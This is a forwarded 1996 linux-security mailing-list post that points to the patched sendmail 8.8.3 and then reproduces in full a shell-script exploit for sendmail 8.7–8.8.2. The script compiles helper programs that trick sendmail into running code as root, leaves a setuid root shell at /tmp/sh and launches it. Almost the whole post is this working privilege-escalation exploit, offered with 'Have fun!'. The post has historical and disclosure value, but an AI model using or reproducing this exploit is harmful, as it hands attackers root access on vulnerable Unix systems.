sendmail.8.8.3 is at ftp.cs.berkeley.edu in /pub/sendmail.
ameth
| shepard@ameth.org |
= http://www.ameth.org =
| Administrator, Ameth Technologies |
---------- Forwarded message ----------
Date: Sun, 17 Nov 1996 02:36:33 +0100 (MET)
From: Dawnshadow <sdx@linnea.asogy.stockholm.se>
Reply-To: linux-security@redhat.com
To: linux-security@redhat.com
Subject: [linux-security] Sendmail 8.8.2 exploit.
Resent-Date: Sun, 17 Nov 1996 18:28:02 -0500
Resent-From: linux-security@redhat.com
Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
similar:
#! /bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh